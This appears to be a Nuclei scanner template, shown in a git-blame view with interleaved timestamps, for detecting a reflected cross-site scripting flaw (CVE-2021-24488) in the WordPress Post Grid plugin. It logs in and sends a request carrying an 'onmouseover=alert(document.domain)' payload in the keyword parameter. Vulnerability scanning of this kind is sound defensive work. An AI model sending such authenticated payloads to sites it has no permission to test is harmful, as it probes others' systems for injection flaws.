2022-02-08 01:07:19 +00:00
id : CVE-2021-24488
info :
2022-08-29 13:55:23 +00:00
name : WordPress Post Grid <2.1.8 - Cross-Site Scripting
2022-02-08 01:07:19 +00:00
author : cckuailong
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,
2022-02-08 01:07:19 +00:00
reference :
- https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
- https://nvd.nist.gov/vuln/detail/CVE-2021-24488
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-24488
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00302
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : pickplugins
product : post_grid
tags : authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin
2022-02-08 01:07:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-08 01:07:19 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 19:02:39 +00:00
GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
2022-02-08 01:07:19 +00:00
Host : {{Hostname}}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-02-08 01:07:19 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-08 19:02:39 +00:00
- 'value="\"onmouseover=alert(document.domain)/">'
- 'Post Grid'
2022-02-08 01:07:19 +00:00
condition : and
- type : status
status :
2022-02-08 19:27:33 +00:00
- 200